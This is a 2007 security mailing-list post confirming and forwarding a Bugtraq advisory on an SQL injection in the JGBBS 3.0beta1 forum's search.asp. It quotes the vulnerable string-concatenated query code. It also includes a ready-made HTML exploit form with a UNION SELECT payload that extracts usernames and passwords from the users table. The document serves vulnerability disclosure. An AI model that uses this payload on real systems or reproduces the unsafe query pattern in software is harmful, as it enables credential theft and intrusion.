[VIM] [TRUE] JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit

Noam Rathaus noamr at beyondsecurity.com
Wed Mar 14 16:30:48 UTC 2007


Hi,

The vulnerability is there (vulnerable code):
    ' The excerpt as posted never assigns title; the line below is assumed
    ' from the surrounding code, which reads it the same way as author.
    title = Request.QueryString("title")
    author = Request.QueryString("author")
    bid = Request.QueryString("bid")

    ' Check parameters: only bid is validated (forced to a non-negative
    ' number); title and author are used verbatim below
    If Not IsNumeric(bid) Then
        bid = 0
    End If
    If CInt(bid) < 0 Then
        bid = 0
    End If
    If title = "" And author = "" Then
        Call ParseError(langErrSearchNoInput)
        Call DoErrorMsg("./search.asp")
    End If

    ' Generate SQL by string concatenation: title and author are spliced
    ' straight into the query text, so a single quote in either one ends
    ' the string literal and the rest is parsed as SQL
    sql = "SELECT * FROM posts"
    If title <> "" Then
        sql = sql & " WHERE post_title LIKE '%" & title & "%'"
    End If

    If author <> "" Then
        If InStr(sql, "WHERE") <> 0 Then
            sql = sql & " AND user_name='" & author & "'"
        Else
            sql = sql & " WHERE user_name='" & author & "'"
        End If
    End If


----------  Forwarded Message  ----------

Subject: JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
Date: Tuesday 13 March 2007 19:21
From: UniquE at unique-key.org
To: bugtraq at securityfocus.com

JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-13}

Product / Vendor :

JGBBS Is a Tree-style Online Forum System

http://sourceforge.net/projects/jgbbs/

Bug :

http://localhost/script/search.asp?author=-SQL Inj.-&bid=0

SQL Injection Exploit :

<html>
<head>
<title>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit</title>
</head>
<body bgcolor="#000000">
<form name="searchFrm" method="get" action="http://localhost/script/search.asp">
<table width="500" border="0" align="center">
  <tr>
    <td colspan="3"><font face="Verdana" size="2" color="#FF0000"><b>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit</b></font></td>
  </tr>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">SQL Injection Code</font></td>
    <td>&nbsp;</td>
    <td><input name="author" type="text" value="UniquE-Key'UNION SELECT 0,1,user_password,3,4,5,user_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 FROM users" class="inputbox" style="color: #000000; width: 300px;"></td>
  </tr>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</font></td>
    <td>&nbsp;</td>
    <td>
      <select name="bid">
        <option value="0">(ALL)</option>
      </select>&nbsp;
      <input type="submit" value="Apply">
    </td>
  </tr>
</table>
</form>
<center>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>UniquE at UniquE-Key.ORG</b></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font>
</center>
</body>
</html>

Tested :

JGBBS 3.0beta1

Vulnerable :

JGBBS 3.0beta1

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

-------------------------------------------------------

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com
  http://www.beyondsecurity.com

